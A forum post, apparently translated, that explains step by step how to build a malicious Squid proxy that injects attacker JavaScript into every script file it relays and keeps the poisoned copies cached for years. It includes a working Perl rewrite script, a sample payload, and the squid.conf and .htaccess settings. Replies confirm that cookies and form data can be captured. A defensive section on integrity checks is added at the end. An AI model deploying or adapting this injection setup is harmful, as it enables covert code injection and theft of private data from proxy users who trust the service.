
[Safe Communication] Utilize proxy servers to hijack users' private data

Posted on 1/19/2015 2:34:56 AM
This post was last edited by Mo Xiaowen on 2015-6-7 23:19


This can be done by simply modifying the configuration of SQUID
What is SQUID?
Squid is software that caches Internet data: it receives download requests from users and automatically processes the downloaded data. When a user wants to download a homepage, he can send the request to Squid and ask Squid to download it on his behalf. Squid then connects to the website, requests the homepage, and sends it to the user while keeping a copy. When other users request the same page, Squid immediately sends them the saved copy, so the download feels quite fast. Squid can proxy protocols such as HTTP, FTP, GOPHER, SSL, and WAIS and handles them automatically, and you can set up Squid according to your needs to filter out unwanted content.
Squid can work in many operating systems, such as AIX, Digital, UNIX, FreeBSD, HP-UX, Irix, Linux, NetBSD, Nextstep, SCO, Solaris, OS/2, etc.
The implementation is very simple:
1. Install Squid on one Linux server.
2. Modify the server's code so that it inserts a piece of our code into every JavaScript file it transmits and sends it out.
3. Set the cache time of our modified js file as high as possible.
This method also applies to websites with SSL enabled if the website loads an insecure resource (such as jQuery from an HTTP site). Most browsers will give a warning, but few people pay attention.
Chema said that more than 5,000 people used his proxy a few days after he released it, and most of them used it to do bad things. Because they were using a proxy, they thought they were anonymous and safe, but they never expected that the proxy server would do bad things too.
Make your malicious proxy server
If you already have a Squid proxy server, you will also need a web server such as Apache.
Step 1 Create a Payload
I use a simple script as a demonstration to point all the hyperlinks to my website.
/etc/squid/payload.js

[mw_shl_code=javascript,true]// Point every hyperlink on the page at one fixed address
for (var i = 0; i < document.getElementsByTagName('a').length; i++)
    document.getElementsByTagName('a')[i].href = "https://blog.haschek.at";[/mw_shl_code]
Step 2 Write a script to infect all JS files
/etc/squid/poison.pl
[mw_shl_code=perl,true]
#!/usr/bin/perl
$|=1;
$count = 0;
$pid = $$;
while(<>)
{
  chomp $_;
  if($_ =~ /(.*\.js)/i)
  {
        $url = $1;
        system("/usr/bin/wget","-q","-O","/var/www/tmp/$pid-$count.js","$url");
        system("chmod o+r /var/www/tmp/$pid-$count.js");
        system("cat /etc/squid/payload.js >> /var/www/tmp/$pid-$count.js");
        print "http://127.0.0.1:80/tmp/$pid-$count.js\n";
  }
  else
  {
        print "$_\n";
  }
$count++;
}[/mw_shl_code]
This script uses wget to fetch the original JavaScript file of the page, appends the code in /etc/squid/payload.js to it, and sends the modified file to the client. You need to create the /var/www/tmp directory and allow Squid to write files in it. This directory stores the modified js files.


Step 3 Combine the above script with Squid
Add it in /etc/squid/squid.conf
[mw_shl_code=html,true]url_rewrite_program /etc/squid/poison.pl[/mw_shl_code]
Step 4 Make the cache never fail
/var/www/tmp/.htaccess
[mw_shl_code=html,true] ExpiresActive On
ExpiresDefault "access plus 3000 days"[/mw_shl_code]
This tells Apache to give these files a long expiration time, so they stay cached until the user cleans up their cache.


If you connect to this proxy, clicking on any hyperlink will redirect you to my website, and the cached file will still exist even if you don't use the proxy later. I just used a non-aggressive payload, and with this method, hackers can do a lot more. So, remind yourself and friends to be cautious about using free proxies.
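
A check from the site owner's side, added here and not part of the original post: a script that has had code appended to it in transit no longer matches its Subresource Integrity digest, and the script tags still fetched over plain HTTP are the ones worth finding. The function names, the cdn.example URLs and the sample script bodies are constructed for illustration.

```javascript
// Added example (Node.js). All sample data below is constructed.
const { createHash } = require('node:crypto');

// Subresource Integrity value for a script body, e.g. "sha384-<base64>".
function sriHash(body, alg = 'sha384') {
  return `${alg}-${createHash(alg).update(body).digest('base64')}`;
}

// Simplified browser-side check for integrity="...": accept the body only if
// one listed digest matches exactly. (Real browsers additionally consider
// only the strongest algorithm present in the attribute.)
function sriMatches(body, integrity) {
  return integrity.trim().split(/\s+/).some((tok) => {
    const alg = tok.split('-', 1)[0];
    return ['sha256', 'sha384', 'sha512'].includes(alg) && sriHash(body, alg) === tok;
  });
}

// List <script> tags loaded over plain HTTP, the resources an intermediary
// can rewrite, and whether each one is pinned with an integrity attribute.
function plainHttpScripts(html) {
  const re = /<script\b[^>]*\bsrc\s*=\s*["'](http:\/\/[^"']+)["'][^>]*>/gi;
  return [...html.matchAll(re)].map((m) => ({
    src: m[1],
    pinned: /\bintegrity\s*=/i.test(m[0]),
  }));
}

// Constructed library body, and the same body with extra code appended.
const original = 'function greet(){ return "hi"; }\n';
const tampered = original + '/* constructed appended code */ void 0;\n';

// Constructed page: one unpinned HTTP script, one pinned, one over HTTPS.
const page = `<script src="http://cdn.example/lib.js"></script>
<script src="http://cdn.example/lib.js" integrity="${sriHash(original)}" crossorigin="anonymous"></script>
<script src="https://cdn.example/app.js"></script>`;

console.log('original verifies:', sriMatches(original, sriHash(original)));
console.log('tampered verifies:', sriMatches(tampered, sriHash(original)));
console.log(plainHttpScripts(page));
```

Serving the script over HTTPS removes the exposure entirely; the integrity attribute covers the case where a third-party host cannot be changed.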





Posted on 1/19/2015 8:48:45 AM |
Yes, all access data can be intercepted by the proxy server, including POST and GET submissions, so how can one speak of privacy?
Posted on 1/19/2015 9:53:53 AM |
Can they intercept my cookies?
Original poster | Posted on 1/20/2015 2:36:06 PM |
Yes